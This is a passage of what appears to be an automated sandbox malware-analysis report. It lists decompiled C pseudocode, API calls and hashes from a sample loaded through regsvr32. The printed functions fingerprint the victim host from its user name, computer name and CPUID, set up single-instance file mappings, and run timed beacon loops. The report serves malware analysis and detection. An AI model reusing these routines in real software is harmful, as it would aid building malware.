0x00fb494b
0x00fb4943

APIs

GetTickCount.KERNEL32 ref: 00FB46E8
wsprintfA.USER32 ref: 00FB4735
wsprintfA.USER32 ref: 00FB4752
wsprintfA.USER32 ref: 00FB4772
wsprintfA.USER32 ref: 00FB4790
wsprintfA.USER32 ref: 00FB47B3
wsprintfA.USER32 ref: 00FB47D4
wsprintfA.USER32 ref: 00FB47F4
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00FB4825
GetTickCount.KERNEL32 ref: 00FB4836
RtlEnterCriticalSection.NTDLL(057395F0), ref: 00FB484A
RtlLeaveCriticalSection.NTDLL(057395F0), ref: 00FB4868

Part of subcall function 00FB624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00FB70D9,00000000,05739630), ref: 00FB6278
Part of subcall function 00FB624D: lstrlen.KERNEL32(00000000,?,00000000,00FB70D9,00000000,05739630), ref: 00FB6280
Part of subcall function 00FB624D: strcpy.NTDLL ref: 00FB6297
Part of subcall function 00FB624D: lstrcat.KERNEL32(00000000,00000000), ref: 00FB62A2
Part of subcall function 00FB624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00FB70D9,?,00000000,00FB70D9,00000000,05739630), ref: 00FB62BF

StrTrimA.SHLWAPI(00000000,00FB92AC,?,05739630), ref: 00FB489D

Part of subcall function 00FB21C1: lstrlen.KERNEL32(057387FA,00000000,00000000,00000000,00FB7100,00000000), ref: 00FB21D1
Part of subcall function 00FB21C1: lstrlen.KERNEL32(?), ref: 00FB21D9
Part of subcall function 00FB21C1: lstrcpy.KERNEL32(00000000,057387FA), ref: 00FB21ED
Part of subcall function 00FB21C1: lstrcat.KERNEL32(00000000,?), ref: 00FB21F8

lstrcpy.KERNEL32(00000000,?), ref: 00FB48BD
lstrcat.KERNEL32(00000000,?), ref: 00FB48CF
lstrcat.KERNEL32(00000000,00000000), ref: 00FB48D5

Part of subcall function 00FB4AA6: lstrlen.KERNEL32(?,00000000,05739C98,7742C740,00FB13D0,05739E9D,00FB55DE,00FB55DE,?,00FB55DE,?,63699BC3,E8FA7DD7,00000000), ref: 00FB4AAD
Part of subcall function 00FB4AA6: mbstowcs.NTDLL ref: 00FB4AD6
Part of subcall function 00FB4AA6: memset.NTDLL ref: 00FB4AE8

wcstombs.NTDLL ref: 00FB4966

Part of subcall function 00FB161A: SysAllocString.OLEAUT32(00000000), ref: 00FB165B
Part of subcall function 00FB161A: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 00FB16DD
Part of subcall function 00FB161A: StrStrIW.SHLWAPI(00000000,006E0069), ref: 00FB171C

Part of subcall function 00FB50CA: RtlFreeHeap.NTDLL(00000000,00000000,00FB4239,00000000,00000001,?,00000000,?,?,?,00FB6B8D,00000000,?,00000001), ref: 00FB50D6

HeapFree.KERNEL32(00000000,?,00000000), ref: 00FB49A7
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00FB49B7
HeapFree.KERNEL32(00000000,00000000,?,05739630), ref: 00FB49C7
HeapFree.KERNEL32(00000000,?), ref: 00FB49D7
RtlFreeHeap.NTDLL(00000000,?), ref: 00FB49E5

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 2871901346-0
Opcode ID: e0490a860c1e29d05eba27e987acd8476beb562f78e936a2eb1cc193d8e19f6d
Instruction ID: 79aeb9fad2e81d0703c43ea449f8e0c4479ffe7700cd5e00b99be2d6f8026192
Opcode Fuzzy Hash: e0490a860c1e29d05eba27e987acd8476beb562f78e936a2eb1cc193d8e19f6d
Instruction Fuzzy Hash: 6FA15871900109AFCB11EFA9DC88EAA3BB9FF48350F144225F909C7261DB75E910EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FB2022, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00FB2022(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				long _t68;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xfba298);
					_v20 = 0;
					_v16 = 0;
					L00FB7D8C();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xfba2c4; // 0x2dc
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xfba2a4 = 5;
						} else {
							_t69 = E00FB1AB8(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xfba2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E00FB5F9A( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_t68 = E00FB3032(_t73, _t90,  &_v92, _a4, _a8); // executed
							_v8.LowPart = _t68;
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xfba29c);
							goto L21;
						} else {
							__eflags =  *0xfba2a0; // 0xa
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E00FB1492();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xfba2a0);
								L21:
								L00FB7D8C();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0xfba290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x00fb2022
0x00fb2034
0x00fb2037
0x00fb2043
0x00fb204b
0x00fb204e
0x00fb21b4
0x00fb2054
0x00fb2054
0x00fb2056
0x00fb205b
0x00fb205c
0x00fb2062
0x00fb2065
0x00fb2068
0x00fb2076
0x00fb2081
0x00fb2084
0x00fb2086
0x00fb2093
0x00fb209d
0x00fb20a1
0x00fb20a4
0x00fb20a9
0x00fb20b4
0x00fb20b4
0x00fb20ab
0x00fb20ab
0x00fb20b2
0x00000000
0x00000000
0x00fb20b2
0x00fb20be
0x00000000
0x00fb20c1
0x00fb20c5
0x00fb20d0
0x00fb20d0
0x00fb20d7
0x00fb20dc
0x00fb20e3
0x00fb20ec
0x00fb20f2
0x00fb20f5
0x00fb20fc
0x00fb20ff
0x00000000
0x00000000
0x00fb2101
0x00fb2104
0x00fb2107
0x00fb210a
0x00000000
0x00fb210c
0x00fb2116
0x00fb211b
0x00fb211b
0x00000000
0x00fb2149
0x00fb2149
0x00fb214e
0x00fb216d
0x00fb216f
0x00fb2174
0x00fb2175
0x00000000
0x00fb2150
0x00fb2150
0x00fb2156
0x00000000
0x00fb2158
0x00fb2158
0x00fb215d
0x00fb215f
0x00fb2164
0x00fb2165
0x00fb217b
0x00fb217b
0x00fb2183
0x00fb218e
0x00fb2191
0x00fb219c
0x00fb219e
0x00fb21a0
0x00fb21a3
0x00000000
0x00fb21a9
0x00000000
0x00fb21a9
0x00fb21a3
0x00fb2156
0x00000000
0x00fb214e
0x00fb211e
0x00fb2120
0x00fb2123
0x00fb2124
0x00fb2124
0x00fb2128
0x00fb2132
0x00fb2132
0x00fb2138
0x00fb213b
0x00fb213b
0x00fb2141
0x00fb2141
0x00fb21be
0x00000000

APIs

memset.NTDLL ref: 00FB2037
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00FB2043
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00FB2068
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00FB2084
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00FB209D
HeapFree.KERNEL32(00000000,00000000), ref: 00FB2132
CloseHandle.KERNEL32(?), ref: 00FB2141
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00FB217B
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00FB560C), ref: 00FB2191
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00FB219C

Part of subcall function 00FB1AB8: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05739308,00000000,?,74B5F710,00000000,74B5F730), ref: 00FB1B07
Part of subcall function 00FB1AB8: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05739340,?,00000000,30314549,00000014,004F0053,057392FC), ref: 00FB1BA4
Part of subcall function 00FB1AB8: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00FB20B0), ref: 00FB1BB6

GetLastError.KERNEL32 ref: 00FB21AE

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: aada56d22c0692dab20ef1b55c6f5d5b09196a968da29e771cdb764ba22ca295
Instruction ID: e8877fd75b28fc36c9b4e4bbd035ecf29cc5492c12a949921ce339042cb3c5fa
Opcode Fuzzy Hash: aada56d22c0692dab20ef1b55c6f5d5b09196a968da29e771cdb764ba22ca295
Instruction Fuzzy Hash: 91513A71C05229AEDF11EF96DC849EEBFB8EF09760F204216F514A2290D7758A40EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FB6384, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00FB6384(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00FB7D86();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xfba2d4; // 0x477d5a8
				_t5 = _t13 + 0xfbb8a2; // 0x5738e4a
				_t6 = _t13 + 0xfbb57c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00FB7A6A();
				_t17 = CreateFileMappingW(0xffffffff, 0xfba2f8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x00fb6384
0x00fb638c
0x00fb6390
0x00fb6396
0x00fb639b
0x00fb63a0
0x00fb63a3
0x00fb63a6
0x00fb63ab
0x00fb63ac
0x00fb63af
0x00fb63b4
0x00fb63bb
0x00fb63c5
0x00fb63c7
0x00fb63c8
0x00fb63cb
0x00fb63e7
0x00fb63ed
0x00fb63f1
0x00fb643f
0x00fb63f3
0x00fb6400
0x00fb6410
0x00fb6418
0x00fb642a
0x00fb642e
0x00000000
0x00000000
0x00fb641a
0x00fb641d
0x00fb6422
0x00fb6424
0x00fb6424
0x00fb6402
0x00fb6404
0x00fb6430
0x00fb6431
0x00fb6431
0x00fb6400
0x00fb6446

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00FB5488,?,00000001,?), ref: 00FB6390
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00FB63A6
_snwprintf.NTDLL ref: 00FB63CB
CreateFileMappingW.KERNELBASE(000000FF,00FBA2F8,00000004,00000000,00001000,?), ref: 00FB63E7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FB5488,?), ref: 00FB63F9
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00FB6410
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FB5488), ref: 00FB6431
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FB5488,?), ref: 00FB6439

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: d4c28b44f1f3bdf1018d8b4f959f2130b41c16c1d1a53f41bea4c1c0888b6c89
Instruction ID: fdcc4024da42f4d7fc63e431a27db0bc636c3c824b9d3e5f31c0c3a6400ae0ea
Opcode Fuzzy Hash: d4c28b44f1f3bdf1018d8b4f959f2130b41c16c1d1a53f41bea4c1c0888b6c89
Instruction Fuzzy Hash: A021D572A04618FBC711EB65DC46FDD77B9AB48790F204121FA05E7190DBB4D901AF61

Uniqueness

Uniqueness Score: -1.00%

Function 00FB4454, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00FB4454(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xfba2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E00FB143F( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xfba2d0 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xfba290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E00FB283A(_v8 + _v8, _t63);
							}
							HeapFree( *0xfba290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xfba290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E00FB283A(_v8 + _v8, _t63);
						}
						HeapFree( *0xfba290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x00fb4454
0x00fb445c
0x00fb4462
0x00fb4465
0x00fb4468
0x00fb446a
0x00fb446f
0x00fb446f
0x00fb4475
0x00fb4477
0x00fb4484
0x00fb44e5
0x00fb4486
0x00fb448b
0x00fb4491
0x00fb4496
0x00fb44a4
0x00fb44a8
0x00fb44b7
0x00fb44be
0x00fb44c5
0x00fb44c5
0x00fb44d0
0x00fb44d0
0x00fb44a8
0x00fb4496
0x00fb44e7
0x00fb44ed
0x00fb44f7
0x00fb44f9
0x00fb44fe
0x00fb450d
0x00fb4511
0x00fb451c
0x00fb4523
0x00fb452a
0x00fb452a
0x00fb4536
0x00fb4536
0x00fb4511
0x00fb453f
0x00fb4541
0x00fb4544
0x00fb4546
0x00fb4549
0x00fb454c
0x00fb4556
0x00fb455a
0x00fb455e

APIs

GetUserNameW.ADVAPI32(00000000,00FB55CE), ref: 00FB448B
RtlAllocateHeap.NTDLL(00000000,00FB55CE), ref: 00FB44A2
GetUserNameW.ADVAPI32(00000000,00FB55CE), ref: 00FB44AF
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00FB55CE,?,?,?,?,?,00FB6BD8,?,00000001), ref: 00FB44D0
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00FB44F7
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00FB450B
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00FB4518
HeapFree.KERNEL32(00000000,00000000), ref: 00FB4536

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: a63a5401553ada594740f70d942c44efdf41a1f7f9f6fed572f85518f4f5104e
Instruction ID: ca126db083d2f60f08d91473225e2f353e9bacec6a526c2a8f2ebf3a01808184
Opcode Fuzzy Hash: a63a5401553ada594740f70d942c44efdf41a1f7f9f6fed572f85518f4f5104e
Instruction Fuzzy Hash: 7931F372A00209EFDB21DFAADD81AAAB7F9BB48350F144529E545D2221DB71EE10AE11

Uniqueness

Uniqueness Score: -1.00%

Function 00FB53F2, Relevance: 10.7, APIs: 7, Instructions: 191
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00FB53F2(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E00FB58F8();
				if(_t27 != 0) {
					_t77 =  *0xfba2b4; // 0x4000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0xfba2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0xfba148(0, 2);
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E00FB696F( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0xfba2d4; // 0x477d5a8
					_push(0xfba2fc);
					_push(1);
					_t7 = _t32 + 0xfbb5ad; // 0x4d283a53
					 *0xfba2f8 = 0xc;
					 *0xfba300 = 0;
					L00FB4AF8();
					_t36 = E00FB6384(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E00FB4454(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E00FB6837(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0xfba2d4; // 0x477d5a8
								_t18 = _t64 + 0xfbb84f; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0xfba32c = _t87;
						}
						_t38 = E00FB60E1();
						 *0xfba2c8 =  *0xfba2c8 ^ 0xe8fa7dd7;
						 *0xfba31c = _t38;
						_t39 = E00FB6837(0x60);
						__eflags = _t39;
						 *0xfba37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0xfba37c; // 0x5739630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0xfba37c; // 0x5739630
							 *_t56 = 0xfbb83e;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0xfba290, _t84, 0x43);
							__eflags = _t42;
							 *0xfba314 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0xfba2b4; // 0x4000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0xfba2d4; // 0x477d5a8
								_t19 = _t76 + 0xfbb53a; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0xfb92a7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E00FB4454( ~_v8 &  *0xfba2c8, 0xfba00c); // executed
								_t84 = E00FB2206(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E00FB1376();
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E00FB2022(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E00FB2439(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0xfba14c();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E00FB6BE1(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}

0x00fb53f2
0x00fb53fd
0x00fb5400
0x00fb5403
0x00fb5406
0x00fb540d
0x00fb540f
0x00fb541b
0x00fb541d
0x00fb541d
0x00fb5426
0x00fb542e
0x00fb5431
0x00fb544b
0x00fb5450
0x00fb5451
0x00fb5453
0x00fb5458
0x00fb545d
0x00fb545f
0x00fb5466
0x00fb5470
0x00fb5476
0x00fb5483
0x00fb548a
0x00fb548f
0x00fb548f
0x00fb5498
0x00fb54c1
0x00fb54c4
0x00fb54d1
0x00fb54d8
0x00fb54e4
0x00fb54e6
0x00fb54e8
0x00fb54ed
0x00fb54f3
0x00fb54f9
0x00fb54ff
0x00fb5502
0x00fb5507
0x00fb550f
0x00fb5511
0x00fb5511
0x00fb5514
0x00fb5514
0x00fb551a
0x00fb551f
0x00fb5527
0x00fb552c
0x00fb5531
0x00fb5533
0x00fb5538
0x00fb5567
0x00fb553a
0x00fb553f
0x00fb5544
0x00fb5549
0x00fb5550
0x00fb5556
0x00fb555b
0x00fb5561
0x00fb5561
0x00fb5568
0x00fb556a
0x00fb5579
0x00fb557f
0x00fb5581
0x00fb5586
0x00fb55b2
0x00fb5588
0x00fb5588
0x00fb558e
0x00fb559b
0x00fb55a1
0x00fb55a1
0x00fb55a9
0x00fb55ab
0x00fb55b3
0x00fb55b5
0x00fb55bc
0x00fb55c9
0x00fb55d3
0x00fb55d5
0x00fb55d7
0x00000000
0x00000000
0x00fb55d9
0x00fb55de
0x00fb55e0
0x00fb55e7
0x00fb55eb
0x00fb55ee
0x00fb5603
0x00fb5607
0x00fb560c
0x00000000
0x00fb560c
0x00fb55f0
0x00fb55f2
0x00000000
0x00000000
0x00fb55f4
0x00fb55fd
0x00fb55ff
0x00fb5601
0x00000000
0x00000000
0x00000000
0x00fb5601
0x00fb55e4
0x00fb55e4
0x00fb55b5
0x00fb549a
0x00fb549a
0x00fb549f
0x00fb560e
0x00fb5612
0x00fb561a
0x00fb561a
0x00000000
0x00fb5612
0x00fb54a5
0x00fb54a8
0x00fb54a8
0x00fb54aa
0x00fb54ad
0x00fb54b5
0x00fb54bc
0x00000000
0x00fb5622
0x00fb5622
0x00fb5625
0x00fb562a
0x00fb562a

APIs

Part of subcall function 00FB58F8: GetModuleHandleA.KERNEL32(4C44544E,00000000,00FB540B,00000000,00000000,00000000,?,?,?,?,?,00FB6BD8,?,00000001), ref: 00FB5907

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,00FBA2FC,00000000), ref: 00FB5476
CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,00FB6BD8,?,00000001), ref: 00FB548F
wsprintfA.USER32 ref: 00FB550F
memset.NTDLL ref: 00FB553F
RtlInitializeCriticalSection.NTDLL(057395F0), ref: 00FB5550
RtlAllocateHeap.NTDLL(00000008,00000043,00000060), ref: 00FB5579
wsprintfA.USER32 ref: 00FB55A9

Part of subcall function 00FB4454: GetUserNameW.ADVAPI32(00000000,00FB55CE), ref: 00FB448B
Part of subcall function 00FB4454: RtlAllocateHeap.NTDLL(00000000,00FB55CE), ref: 00FB44A2
Part of subcall function 00FB4454: GetUserNameW.ADVAPI32(00000000,00FB55CE), ref: 00FB44AF
Part of subcall function 00FB4454: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00FB55CE,?,?,?,?,?,00FB6BD8,?,00000001), ref: 00FB44D0
Part of subcall function 00FB4454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00FB44F7
Part of subcall function 00FB4454: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00FB450B
Part of subcall function 00FB4454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00FB4518
Part of subcall function 00FB4454: HeapFree.KERNEL32(00000000,00000000), ref: 00FB4536

Part of subcall function 00FB6837: RtlAllocateHeap.NTDLL(00000000,00000000,00FB4197), ref: 00FB6843

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
